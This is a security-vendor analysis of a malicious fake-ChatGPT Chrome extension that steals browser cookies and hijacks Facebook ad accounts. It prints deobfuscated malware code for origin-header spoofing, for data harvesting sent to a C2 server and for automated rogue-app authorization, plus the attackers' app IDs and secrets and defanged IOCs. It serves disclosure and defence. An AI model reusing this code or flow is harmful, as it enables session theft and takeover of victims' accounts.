labs.guard.io Open in urlscan Pro
162.159.152.4  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Open in app

Sign up

Sign in

Write


Sign up

Sign in




“FAKEGPT”: NEW VARIANT OF FAKE-CHATGPT CHROME EXTENSION STEALING FACEBOOK AD
ACCOUNTS WITH THOUSANDS OF DAILY INSTALLS

Guardio

·

Follow

9 min read
·
Mar 8, 2023

121

4

Listen

Share

By Nati Tal (Guardio Labs)

> A Chrome Extension propelling quick access to fake ChatGPT functionality was
> found to be hijacking Facebook accounts and installing hidden account
> backdoors. Particularly noticeable is the use of a malevolent silently forced
> Facebook app “backdoor” giving the threat actors super-admin permissions.
> 
> By hijacking high-profile Facebook business accounts, the threat actor creates
> an elite army of Facebook bots and a malicious paid media apparatus. This
> allows it to push Facebook paid ads at the expense of its victims in a
> self-propagating worm-like manner.
> 
> In this write-up, we will uncover the techniques used by this powerful stealer
> that started propagating on Facebook and the official Google Chrome Store
> early this month with thousands of new installations per day — and yet to be
> detected by either Facebook or Google.

Update: March 22, 2023 — Guardio Labs discovered another variant in this FakeGPT
campaign, abusing open-source code and yet again hijacking Facebook profiles —
read about it here.

Update: March 9, 2023 — Following Guardio’s report regarding this malicious
extension to Google, the extension is now removed from Chrome’s store.


THE VICIOUS CIRCLE OF HIJACKED FACEBOOK MALVERTISING

Our security research team at Guardio is constantly monitoring the activity
surrounding ChatGPT’s brand abuse, with endless campaigns propagating malware
and phishing for your credit cards. On 3/3/2023, our team detected a new variant
of a malicious fake ChatGPT browser extension, part of a campaign started in
early February with several other ChatGPT branded malicious extensions. This
time upgraded with a threatening technique to take over your Facebooks accounts
as well as a sophisticated worm-like approach for propagation.


Malicious Sponsored Posts on Facebook leading to the Malicious “FakeGPT”
extension

The malicious stealer-extension, titled “Quick access to Chat GPT” is promoted
on Facebook-sponsored posts as a quick way to get started with ChatGPT directly
from your browser. Although the extension gives you that (by simply connecting
to the official ChatGPT’s API) it also harvests every information it can take
from your browser, steals cookies of authorized active sessions to any service
you have, and also employs tailored tactics to take over your Facebook account.


From malvertising, extension installation, hijacking Facebook accounts, and back
again to propagation

Once the Threat Actor takes ownership of your stolen data, it will probably sell
it to the highest bidder as usual, yet while we dug deeper into this operation
we’ve noticed their extra care on High-Profile Facebook business accounts. With
this approach, the campaign can continue propagating with its very own army of
hijacked Facebook bot accounts, publishing more sponsored posts and other social
activities on behalf of its victim's profiles and spending business account
money credits!

The above high-level campaign description hides inside it some sophisticated
techniques to harvest victims' details and take over Facebook accounts. Those
are abusing online services and powerful APIs from both Google and Facebook —
giving those threat actors some very powerful tools for success.


ABUSING VICTIM BROWSER’S CONTEXT

Once the extension is installed, it gives you what’s advertised — a small popup
window showing up after you click on the extension icon, with a prompt to ask
ChatGPT whatever you want.

Yet, this is exactly where it starts to get fishy. The extension is now an
integral part of your browser. Thus, it can send any request to any other
service — as if the browser owner itself was initiating this from the same
context. This is crucial — as the browser, in most cases, already has an active
and authenticated session with almost all your day-to-day services, e.g.
Facebook.

More specifically, this allows the extension to access Meta’s Graph API for
developers — allowing the threat actor to quickly access all your details and
also take actions on your behalf directly in your Facebook account using simple
API calls.


The “Quick Access” extension sends API calls from the authenticated browser
context

There are of course limitations and security measures taken by Facebook— e.g.,
making sure the requests are originating from an authenticated user as well as
from the relevant origin. The extension already has an authenticated session
with Facebook, but what about the origin of the requests it sends? Well, thanks
to Chrome’s declarativeNetRequest API, the extension has a simple way to
circumvent Facebook’s protection.

The following piece of code is called on the malicious extension right on
initiation, making sure all requests made to facebook.com by any source on your
browser (including the extension itself) will have their headers modified to
reflect the origin as “facebook.com” as well. This gives the extension the
ability to freely browse any Facebook page (including making API calls and
actions) using your infected browser and without any trace.

 yield chrome.declarativeNetRequest.updateDynamicRules({
      addRules: [{
              "id": 1,
              "priority": 1,
              "action": {
                  type: 'modifyHeaders',
                  requestHeaders: [
                      { header: 'origin', operation: 'set', value: `https://www.${d}` }
                  ],
              },
              "condition": { "urlFilter": `www.${d}`, "resourceTypes": ["xmlhttprequest"] }
          }
      ],
      removeRuleIds: [1]
  });java

Note that the variable d is holding the relevant domain (in our case
facebook.com), as was sent back to the extension from the C2 server at
api2[.]openai-service[.]workers[.]dev


HARVESTING DATA AND SENDING IT BACK TO C2 SERVERS

Now, once the victim opens the extension windows and writes a question to
ChatGPT, the query is sent to OpenAIs servers to keep you busy — while in the
background it immediately triggers the harvest.

Following are some examples of deobfuscated code from the malicious extension
source. It was written in typescript and packed/minified, yet using the .map
files inside we managed to reassemble the code to be more readable — showing all
function and variable names that emerged to be truly informative and quite
obvious to the real intentions of this code from first sight:

    
// index.ts
start() {
    return __awaiter(this, void 0, void 0, function* () {
        try {yield Promise.all([
                this.getToken(),
                this.getClientIP(),
                this.getTokenEQ()
            ]);
            yield this.fetchAds();
        }
        catch (error) {}
        finally {}
    });
}
// From ads.ts
run() {
    return __awaiter(this, void 0, void 0, function* () {
        try {yield Promise.all([
                this.getListAds(),
                this.getListPages(),
                this.getListBM(),
                this.SendToServer()
            ]);
            if (this.is_big) {
                new portal_1.Potal(this.fb_dtsg, this.uid).run();}
        }
        catch (error) {}
    });
}

The above are the main functions that execute different queries using Facebook’s
Graph API as well as other Chrome APIs like getting all your cookies. A
noteworthy examples from the code:

// ads.ts
// index_1.VLKSF_DOM = 'facebook.com'

getInfoAdAccountGraph(account_id) {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            const url = `https://graph.${index_1.VLKSF_DOM}/v14.0/act_${account_id}?method=get&date_format=U&
fields=amount_spent,insights.date_preset(data_maximum)%7Bspend%7D,account_id,funding_source_details,adspaymentcycle%7Bthreshold_amount%7D,
name,created_time,last_used_time,currency,timezone_name,stored_balance_status,business,balance,adtrust_dsl,spend_cap,disable_reason,
is_prepay_account,total_prepay_balance.fields(amount),max_billing_threshold.fields(amount),min_billing_threshold.fields(amount),
am_tabular.date_preset(data_maximum).column_fields(spend),owner,agencies.fields(id,role,name),users.fields(id,role,name),has_extended_credit&access_token=${this.token}`;
            const options = {
                url
            };
            let data = yield this._request(options);
[...]

The above Graph API call will give the attackers everything they need about your
Business Facebook account (if available) including your currently active
promotions and credit balance. Later, the extension examines all the harvested
data, preps it, and sends it back to the C2 server using the following API calls
— each according to relevancy and data type:

api2[.]openai-service[.]workers[.]dev/api/add-data-account
api2[.]openai-service[.]workers[.]dev/api/add-business-manager
api2[.]openai-service[.]workers[.]dev/api/add-pages
api2[.]openai-service[.]workers[.]dev/api/add-ads-manage
api2[.]openai-service[.]workers[.]dev/api/update-data-login-account

Each call includes a detailed JSON formatted payload with ALL that they need,
including session cookies, money balance, and whatnot. Just a quick example of
the basic data being exfiltrated:


Example of out-going data from the extension to C2 on API call
“add-data-account”

Example of out-going data from the extension to C2 on API call “add-ads-manager”

In the first example, the full list of cookies was reduced for display, yet you
will find there ALL cookies stored on your browser — including security and
session tokens to services like YouTube, Google accounts, Twitter, etc.
In the second example — once the extension finds out you have a business page,
it will collect your Facebook account details and all your current ads
configuration as well as financial data as seen above.


TAKING OVER ACCOUNTS WITH A ROGUE FACEBOOK APPLICATION

Now the threat actors have enough data to make a profit from — And yet, if they
found your account interesting enough for themselves (e.g. you have a business
page with tons of likes and an advertisement plan with credits waiting to be
spent) — it’s time to take over and get control!

A specifically developed module in the extension code (Portal.ts) includes a
class named Potal (yep, with a typo..) that is the one responsible for this
magic. Instead of trying to harvest account passwords, or try to bypass 2FA with
session tokens (which is not that easy due to Facebook’s security measures),
this threat actor chooses another way — a Malicious Facebook Application.

An application under Facebook’s ecosystem is usually a SaaS service that was
approved to be using its special API, allowing the 3rd party service to get
account information as well as make actions on your behalf. We all remember
those apps spamming our feed with promotional posts, but this threat actor is
taking it to another level.

The Potal module is, once again, abusing the ChatGPT popup context to send
requests to Facebook servers on your behalf — this time automating the entire
process of registering an app on your account and approving it to get,
basically, A FULL ADMIN MODE.

This threat actor uses 2 main apps, as seen in the code:

let apps = {
    "portal": {
        app_id: "1348564698517390",
        secrect: "007c0a9101b9e1c8ffab727666805038",
    },
    "msg_kig": {
        app_id: "1174099472704185",
        secrect: "0722a7d5b5a4ac06b11450f7114eb2e9",
    }

The first malicious Facebook app (portal) is not available anymore, yet the
second one is still alive and kicking. To really understand what it does, we’ve
manipulated Facebook’s settings page, changing the app_id of a real installed
app on our account with the one used by this threat actor:

https://www[.]facebook[.]com/settings/applications/app_details/?app_id=1174099472704185 

This way we’ve revealed its name, icon, and most important — the long (really
long) list of permissions granted:



This app, which for some reason is actually approved by Facebook and functional,
seems to request all permissions available! From full control of your Facebook
profile and activity to admin powers on all your groups, pages, businesses, and
of course advertisement accounts. They can even manage your connected WhatsApp
and Instagram accounts!

Moreover, it uses the same name and icon as an official app from Facebook:


The listing of the official Messenger Kids app by Facebook

The process of automating the addition of the app to the victims' accounts can
be seen in this main function of the Potal module. All the functions here are
using, yet again, the Facebook Graph API with no single interaction needed from
the victim — from the request to add the application, through authentication and
final confirmation:

run() {
    return __awaiter(this, void 0, void 0, function* () {
        try {
            yield this.getUserCode();
            yield this.authorize();
            yield this.oauth();
            if (!this.encrypted_post_body)
                return console.log("CANT GET ENCRYPT");
            yield this.comfirm();
            if (!this.confirm_code)
                return console.log("CANT GET COMFIRM CODE");
            yield this.addDevice();
            yield this.login_status();
            yield this.createSessionForApp();
            if (this.cookies) {
                yield this.SendToServer();
            }
        }
        catch (error) {
        }
    });
}

This time, the data exfiltrated here is being encrypted before being sent back
home — we assume this is due to the threat actor targeting only truly valuable
targets with this method, and for their use of self-propagation of this and
other malicious activities using Facebook-promoted posts created with those
accounts.


CONCLUSION

Not only this malicious extension is free-roaming on the official Chrome store
(and still live as those lines are being written), but it is also abusing
Facebook’s official applications API in a way that should have triggered policy
enforcers' attention already. Not to mention the false and malevolent promoted
posts being so easily approved by Facebook.

There are more than 2000 users installing this extension on a daily basis since
its first appearance on 03/03/2023 — each one gets his Facebook account stolen
and probably this is not the only damage.

We see lately a troublesome hit on the trust we used to blindly give to the
companies and big names that are responsible for the majority of our online
presence and activity — Google still allows malvertising on its promoted search
results, YouTube can’t get rid of those hijacked channels promoting Cryptoscams,
and Facebook allows permission-hungry fake applications that mimic Facebook’s
own apps!

These activities are, probably, here to stay. Thus we must be more vigilant even
on our day-to-day casual browsing — don’t click on the first search result, and
always make sure you won’t click on sponsored links and posts unless you are
pretty sure who is behind them!




IOCS

Original Facebook Post and Pages:
https://www[.]facebook[.]com/chatgpt.google/videos/719341863011965/
https://www[.]facebook[.]com/chatgpt.google/

Extension IDs:
kgnddmccicfibljeodejjmekeiilkfhk (latest)
coegmjlpjblmfpcnleenkhggdebdcpho
boofekcjiojcpcehaldjhjfhcienopme

C2 Servers:
api2[.[openai-service[.]workers[.]dev
df3233[.]workers[.]dev
xfks[.]workers[.]dev

C2 API Calls:
api2[.]openai-service[.]workers[.]dev/api/add-data-account
api2[.]openai-service[.]workers[.]dev/api/add-business-manager
api2[.]openai-service[.]workers[.]dev/api/add-pages
api2[.]openai-service[.]workers[.]dev/api/add-ads-manager
api2[.]openai-service[.]workers[.]dev/api/update-data-login-account

Facebook app IDs:
1348564698517390 (portal)
1174099472704185 (Messenger Kids for iOS - active)

Facebook Graph API calls in use:
graph[.]facebook[.]com/v12.0/me/businesses?
graph[.]facebook[.]com/v12.0/me/business/adaccount/limits?
graph[.]facebook[.]com/v13.0/me/facebook_pages?
graph[.]facebook[.]com/v12.0/me/adaccounts?
graph[.]facebook[.]com/v12.0/v14.0/act_{account_id}?
graph[.]facebook[.]com/ads/adbuilder
graph[.]facebook[.]com/me/?fields=id,name,birthday,email&access_token=
graph[.]facebook[.]com/v2.6/device/login_status?
graph[.]facebook[.]com/auth/create_session_for_app?
graph[.]facebook[.]com/v2.6/device/login?
graph[.]facebook[.]com/graphql
www[.]facebook[.]com/ajax/bootloader-endpoint/?modules=AdsLWIDescribeCustomersContainer.react
www[.]facebook[.]com/ajax/oauth/device.php
www[.]facebook[.]com/v2.0/dialog/oauth/confirm/
www[.]facebook[.]com/dialog/oauth
www[.]facebook[.]com/oauth/device/authorize
www[.]facebook[.]com/api/graphql/

Other:
https://lumtest[.]com/myip.json




SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD.


FREE



Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.


Sign up for free


MEMBERSHIP



Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app


Try for 5 $/month
ChatGPT
Browser Security
Facebook
Chrome Extension
Cybersecurity


121

121

4


Follow



WRITTEN BY GUARDIO

827 Followers

Keeping your online identity and information secure on every corner of the web.
#SafeBrowsing Learn more at https://guard.io

Follow




MORE FROM GUARDIO

Guardio


“ECHOSPOOFING” — A MASSIVE PHISHING CAMPAIGN EXPLOITING PROOFPOINT’S EMAIL
PROTECTION TO DISPATCH…


BY NATI TAL (HEAD OF GUARDIO LABS)

Jul 29
128



Guardio


“SCAMMERS PARADISE” —EXPLORING TELEGRAM’S DARK MARKETS, BREEDING GROUND FOR
MODERN PHISHING…


BY OLEG ZAYTSEV, NATI TAL (GUARDIO LABS)

Jan 29
95



Guardio


“ETHERHIDING” — HIDING WEB2 MALICIOUS CODE IN WEB3 SMART CONTRACTS


BY NATI TAL, OLEG ZAYTSEV (GUARDIO LABS)

Oct 13, 2023
397
7



Guardio


“PHISHFORCE” — VULNERABILITY UNCOVERED IN SALESFORCE’S EMAIL SERVICES EXPLOITED
FOR PHISHING…


BY OLEG ZAYTSEV, NATI TAL (GUARDIO LABS)

Aug 2, 2023
107
4


See all from Guardio



RECOMMENDED FROM MEDIUM

Austin Starks

in

DataDrivenInvestor


I USED OPENAI’S O1 MODEL TO DEVELOP A TRADING STRATEGY. IT IS DESTROYING THE
MARKET


IT LITERALLY TOOK ONE TRY. I WAS SHOCKED.


Sep 15
4.7K
123



Alexander Nguyen

in

Level Up Coding


THE RESUME THAT GOT A SOFTWARE ENGINEER A $300,000 JOB AT GOOGLE.


1-PAGE. WELL-FORMATTED.


Jun 1
24K
484




LISTS


WHAT IS CHATGPT?

9 stories·455 saves


THE NEW CHATBOTS: CHATGPT, BARD, AND BEYOND

12 stories·489 saves


CHATGPT

21 stories·848 saves


CHATGPT PROMPTS

50 stories·2138 saves


Datingzest


CAN YOU REVERSE IMAGE SEARCH ON TINDER? — HERE’S HOW IT’S DONE


WE’RE ABOUT TO LEARN HOW TO DO A REVERSE IMAGE SEARCH ON TINDER. IT’S EASIER
THAN YOU MIGHT THINK, AND IT’S HELPFUL AND, WELL, HANDY IF…

Jun 26




Aaron Dinin, PhD



in

Entrepreneurship Handbook


ARE YOU ACTUALLY BUILDING A BUSINESS OR JUST “PLAYING ENTREPRENEUR”?


IF YOU’VE BEEN WORKING ON THE SAME COMPANY FOR A LONG TIME AND HAVEN’T MADE MUCH
PROGRESS, THERE’S PROBABLY A GOOD REASON.


4d ago
1.3K
33



Creole Studios


HOW TO BUILD A CHROME EXTENSION WITH NEXT.JS IN 2024


IN THE EVOLVING LANDSCAPE OF WEB DEVELOPMENT, CHROME EXTENSIONS HAVE EMERGED AS
POWERFUL TOOLS TO ENHANCE BROWSER FUNCTIONALITY AND USER…

Aug 7
2



Desiree Peralta

in

Publishous


ONLYFANS IS FINALLY DEAD


AND I’M HAPPY ABOUT IT.


Oct 8
16.3K
318


See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams


To make Medium work, we log user data. By using Medium, you agree to our Privacy
Policy, including cookie policy.